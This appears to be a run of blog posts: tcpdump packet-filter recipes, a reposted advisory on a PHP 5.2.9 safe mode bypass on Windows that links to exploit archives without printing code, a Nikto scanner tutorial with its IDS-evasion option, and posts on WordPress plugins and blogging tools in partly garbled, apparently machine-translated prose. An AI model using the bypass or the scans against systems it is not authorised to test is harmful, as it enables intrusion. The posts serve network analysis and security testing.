In the TCP 3-way handshakes, the exchange between hosts goes like this :
1. Source sends SYN
2. Destination answers with SYN, ACK
3. Source sends ACK
- If we want to match packets with only the SYN flag set, the 14th byte would have a binary
value of 00000010 which equals 2 in decimal.
# tcpdump -i eth1 ‘tcp[13] = 2′
- Matching SYN, ACK (00010010 or 18 in decimal)
# tcpdump -i eth1 ‘tcp[13] = 18′
- Matching either SYN only or SYN-ACK datagrams
# tcpdump -i eth1 ‘tcp[13] & 2 = 2′
We used a mask here. It will returns anything with the ACK bit set (thus the SYN-ACK combination as well)
Let’s assume the following examples (SYN-ACK)
00010010 : SYN-ACK packet
00000010 : mask (2 in decimal)
——–
00000010 : result (2 in decimal)
Every bits of the mask match !
- Matching PSH-ACK packets
# tcpdump -i eth1 ‘tcp[13] = 24′
- Matching any combination containing FIN (FIN usually always comes with an ACK so we either
need to use a mask or match the combination ACK-FIN)
# tcpdump -i eth1 ‘tcp[13] & 1 = 1′
- Matching RST flag
# tcpdump -i eth1 ‘tcp[13] & 4 = 4′
By looking at the TCP state machine diagram (http://www.wains.be/pub/networking/tcp_state_machine.jpg)
we can find the different flag combinations we may want to analyze.
Ideally, a socket in ACK_WAIT mode should not have to send a RST. It means the 3 way handshake has not completed.
We may want to analyze that kind of traffic.
Matching SMTP data :
——————–
I will make a filter that will match any packet containing the “MAIL” command from SMTP exchanges.
I use something like http://www.easycalculation.com/ascii-hex.php to convert values from ASCII to hexadecimal.
“MAIL” in hex is 0×4d41494c
The rule would be :
# tcpdump -i eth1 ‘((port 25) and (tcp[20:4] = 0×4d41494c))’
It will check the bytes 21 to 24. “MAIL” is 4 bytes/32 bits long..
This rule would not match packets with IP options set.
This is an example of packet (a spam, of course) :
# tshark -V -i eth0 ‘((port 25) and (tcp[20:4] = 0×4d41494c))’
Capturing on eth0
Frame 1 (92 bytes on wire, 92 bytes captured)
Arrival Time: Sep 25, 2007 00:06:10.875424000
[Time delta from previous packet: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Packet Length: 92 bytes
Capture Length: 92 bytes
[Frame is marked: False]
[Protocols in frame: eth:ip:tcp:smtp]
Ethernet II, Src: Cisco_X (00:11:5c:X), Dst: 3Com_X (00:04:75:X)
Destination: 3Com_X (00:04:75:X)
Address: 3Com_X (00:04:75:X)
…. …0 …. …. …. …. = IG bit: Individual address (unicast)
…. ..0. …. …. …. …. = LG bit: Globally unique address (factory default)
Source: Cisco_X (00:11:5c:X)
Address: Cisco_X (00:11:5c:X)
…. …0 …. …. …. …. = IG bit: Individual address (unicast)
…. ..0. …. …. …. …. = LG bit: Globally unique address (factory default)
Type: IP (0×0800)
Internet Protocol, Src: 62.163.X (62.163.X), Dst: 192.168.X (192.168.X)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0×00 (DSCP 0×00: Default; ECN: 0×00)
0000 00.. = Differentiated Services Codepoint: Default (0×00)
…. ..0. = ECN-Capable Transport (ECT): 0
…. …0 = ECN-CE: 0
Total Length: 78
Identification: 0×4078 (16504)
Flags: 0×04 (Don’t Fragment)
0… = Reserved bit: Not set
.1.. = Don’t fragment: Set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 118
Protocol: TCP (0×06)
Header checksum: 0×08cb [correct]
[Good: True]
[Bad : False]
Source: 62.163.X (62.163.X)
Destination: 192.168.X (192.168.XX)
Transmission Control Protocol, Src Port: 4760 (4760), Dst Port: smtp (25), Seq: 0, Ack: 0, Len: 38
Source port: 4760 (4760)
Destination port: smtp (25)
Sequence number: 0 (relative sequence number)
[Next sequence number: 38 (relative sequence number)]
Acknowledgement number: 0 (relative ack number)
Header length: 20 bytes
Flags: 0×18 (PSH, ACK)
0… …. = Congestion Window Reduced (CWR): Not set
.0.. …. = ECN-Echo: Not set
..0. …. = Urgent: Not set
…1 …. = Acknowledgment: Set
…. 1… = Push: Set
…. .0.. = Reset: Not set
…. ..0. = Syn: Not set
…. …0 = Fin: Not set
Window size: 17375
Checksum: 0×6320 [correct]
[Good Checksum: True]
[Bad Checksum: False]
Simple Mail Transfer Protocol
Command: MAIL FROM:<wguthrie_at_mysickworld–dot–com>\r\n
Command: MAIL
Request parameter: FROM:<wguthrie_at_mysickworld–dot–com>
Matching HTTP data :
——————–
Let’s make a filter that will find any packets containing GET requests
The HTTP request will begin by :
GET / HTTP/1.1\r\n (16 bytes counting the carriage return but not the backslashes !)
If no IP options are set.. the GET command will use the byte 20, 21 and 22
Tcpdump is only able to match data size of either 1, 2 or 4 bytes, we will take the following ASCII
character following the GET command (a space)
“GET ” in hex : 47455420
# tcpdump -i eth1 ‘tcp[20:4] = 0×47455420′
Matching other interesting TCP things :
—————————————
SSH connection (on any port) :
We will be looking for the reply given by the SSH server.
OpenSSH usually replies with something like “SSH-2.0-OpenSSH_3.6.1p2″.
The first 4 bytes (SSH-) have an hex value of 0×5353482D.
# tcpdump -i eth1 ‘tcp[(tcp[12]>>2):4] = 0×5353482D’
If we want to find any connection made to older version of OpenSSH (version 1, which are insecure and subject to MITM attacks) :
The reply from the server would be something like “SSH-1.99..”
# tcpdump -i eth1 ‘(tcp[(tcp[12]>>2):4] = 0×5353482D) and (tcp[((tcp[12]>>2)+4):2] = 0×312E)’
UDP header
———-
0 7 8 15 16 23 24 31
+——–+——–+——–+——–+
| Source | Destination |
| Port | Port |
+——–+——–+——–+——–+
| | |
| Length | Checksum |
+——–+——–+——–+——–+
| |
| DATA … |
+———————————–+
Nothing really interesting here.
If we want to filter ports we would use something like :
# tcpdump -i eth1 udp dst port 53
ICMP header
———–
See different ICMP messages :
http://img292.imageshack.us/my.php?image=icmpmm6.gif
We will usually filter the type (1 byte) and code (1 byte) of the ICMP messages.
Here are common ICMP types :
0 Echo Reply [RFC792]
3 Destination Unreachable [RFC792]
4 Source Quench [RFC792]
5 Redirect [RFC792]
8 Echo [RFC792]
11 Time Exceeded [RFC792]
We may want to filter ICMP messages type 4, these kind of messages are sent in case of congestion of the network.
# tcpdump -i eth1 ‘icmp[0] = 4′
If we want to find the ICMP echo replies only, having an ID of 500. By looking at the image with all the ICMP packet description
we see the ICMP echo reply have the ID spread across the 5th and 6th byte. For some reason, we have to filter out with the value in hex.
# tcpdump -i eth0 ‘(icmp[0] = 0) and (icmp[4:2] = 0×1f4)’
May 26
Title : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor Site : www.php.net
Vulnerability Discoverd by : www.abysssec.com
Description :
Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior – implement and interfacing between php
and operation systems directory structure . the problem is php won’t tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on targert machie even in SafeMod On (php.ini setting) .
Vulnerability :
in linux when you want open a directory for example php directory you need
to go to /usr/bin/php and you can’t use \usr\bin\php . but windows won’t tell
diffence between slash and back slash it means there is no didffrence between
c:\php and c:/php , and this is not vulnerability but itself but because of this simple
php implement "\" character can escape safemode using function like excec .
PoC / Exploit :
orginal : www.abysssec.com/safemod-windows.zip
mirror : www.milw0rm.com/sploits/2009-safemod-windows.zip
note : this vulnerabities is just for educational purpose and showing vulnerability exist
so author will be not be responsible for any damage using this vulnerabilty.
for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com
May 25
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is not designed as an overly stealthy tool. It will test a web server in the shortest timespan possible, and it’s fairly obvious in log files. However, there is support for LibWhisker’s anti-IDS methods in case you want to give it a try (or test your IDS system).
Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.
Nikto Site:http://www.cirt.net/nikto2
Download nikto:
wget http://www.cirt.net/nikto/nikto-current.tar.gz
Install:
tar zxvf nikto-current.tar.gz
Nikto Help:
[root@localhost nikto]# ./nikto.pl -h
Option host requires an argument
-Cgidirs+ scan these CGI dirs: ‘none’, ‘all’, or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors (cannot be abbreviated)
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ host authentication to use, format is userid:password
-mutate+ Guess additional file names
-output+ write output to this file
-port+ port to use (default 80)
-Display+ turn on/off display outputs
-ssl force ssl mode on port
-Single Single request mode
-timeout+ timeout (default 2 seconds)
-Tuning+ scan tuning
-update update databases and plugins from cirt.net (cannot be abbreviated)
-Version print plugin and database versions
-vhost+ virtual host (for Host header)
+ requires a value
Example:
1.Basic Testing
The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.0.1 on TCP port 80:
perl nikto.pl -h 192.168.1.10
To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:
perl nikto.pl -h 192.168.1.10 -p 443
Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned:
perl nikto.pl -h https://192.168.1.10:443/
There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.
perl nikto.pl -h 192.168.1.10 -p 443 –ssl
2. Multiple Port Testing
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.1.10 -p 80,88,443
3. Multiple Host Testing
Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Ports can be separated from the host and other ports via a colon or a comma. If no port is specified, port 80 is assumed.
This is an example of a valid hosts file:
192.168.1.1:80
192.168.1.2,80
192.168.1.3
192.168.1.10,80,443
192.168.1.10:80:443
localhost:8888
4. Using a Proxy
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test can still be performed. Set the PROXY* variables (as described in section 4), then execute Nikto with the -u (-useproxy) command. All connections will be relayed through the HTTP proxy specified in the configuration file.
perl nikto.pl -h 192.168.1.10 -p 80 –u
5. Updating
Nikto can be automatically updated, assuming you have Internet connectivity from the host Nikto is installed on. To update to the latest plugins and databases, simply run Nikto with the -update command.
perl nikto.pl -update
Note:
The -update option cannot be abbreviated.
If updates are required, you will see a list of the files downloaded:
perl nikto.pl –update
+ Retrieving ‘nikto_core.plugin’
+ Retrieving ‘CHANGES.txt’
Updates may also be manually downloaded from http://www.cirt.net/
May 24
I find a plugin of wordpress. This plugin will create a Google sitemaps compliant XML-Sitemap of your WordPress blog. It supports all of the WordPress generated pages as well as custom ones. Everytime you edit or create a post, your sitemap is updated and all major search engines that support the sitemap protocol, like ASK.com, Google, MSN Search and YAHOO, are notified about the update.
Related Links:
Download Url
http://downloads.wordpress.org/plugin/google-sitemap-generator.3.1.2.zip
Install:
If you have any problem about the plugin, you can post comment, I will do my best.
May 23
As a blog writer, I’ve been using a few that smooth out the experience and get rid of a few annoyances.
Here are a few suggestions.
Windows Live Writer – Use Writer, you can easily log in all services to share photos and video – Windows Live, WordPress, Blogger, LiveJournal, TypePad, etc..
WriteToMyBlog – WriteToMyBlog is a free web based word processor for your Blog. Create Post Entries for your Blog from right here, completely free, no membership required, can Post to multiple Blogs simultaneously, manage your Posts, works with all major Blog programs, and is easy-peasy!
Scribefire – Performancing.com’s popular split-browser blog editor. Multiple blog management, categories and simple source editing. FTP Uploads are available but buggy. No good image support.
Deepest Sender – Very similar to ScribeFire, these two extensions lack greater features like image uploading, time-stamp editing and compatible tagging. Both are very easy to set up.
Resizable Text Area – If you stick with your regular blog editor, such as Wordpress, this extension comes in handy to resize the text area quickly and freely.
Spellbound & Google Toolbar - Inline spell-check, ala Microsoft Word. Use the extension or Google Toolbar’s built-in spell-checker. Both work great. Superseded by Firefox 2’s built in spell check.
Tabinta – turns the Tab Button to a text editor spacing tab rather than cycling through the web forms. Only interacts with the text area, otherwise does the regular Firefox tabbing.
Split Browser – Great when copy and pasting content and URLs, this extension makes it easy to split any tab any which way. Put your editor in a ’sidebar’ and continue surfing the other tabs in the other pane.
Copy Plain Text – This is a can’t-live-without extension for me. When I copy text, I don’t want any of the original site’s formating, links or text-link-ads to be copied over as well. Just the text. That’s what this extension does.
Copy As HTML Link - Use this extension in conjunction with Copy Plain Text to create links for your posts. Only make links when you want with the text you want.
May 23
Wordpress theme in use can display a summary the_excerpt, but often we are content in order to avoid duplication or production of Class Magazine theme, the need to better control the length of a summary, which requires the use of a number of plug-ins. I have collected 7 Wordpress Abstract plug-ins for your reference.
Senior summary WordPress plug-ins. Summary of support in the background set the length of the display of a final summary of the characters, as well as the HTML tags which allow the display in the summary. When the Chinese used in the summary of the final show will be a placeholder of garbage, has yet to find a solution.
Wordpress is a summary of the early plug-ins. No background set, but functions more optional parameters, including the summary length, a summary format, which allows HTML tags, custom, etc. MORE link. It does not the_excerpt through the built-in function, but the use of plug-letter the_excerpt_reloaded.
Features a rich plugin Wordpress Abstract. Completion of all the settings in the background, summary of the length of the letter can be the number of words or paragraphs truncated. Can also set whether to allow HTML tags, which automatically cut off the page summary of the output, since the definition of a summary at the end of the text and link text, etc. MORE.
A very simple Wordpress plug-ins. No background settings, the use of the_content_limit (1000, “Read more …”) to call, in which the length of the figure is a summary. This plug-in is the contents of the article formed truncated summary will retain all the HTML tags.
If you are the kind of content manually enter a summary of people, that this very useful plug-ins. It provides a summary of regional input to add a rich text editor TinyMCE.
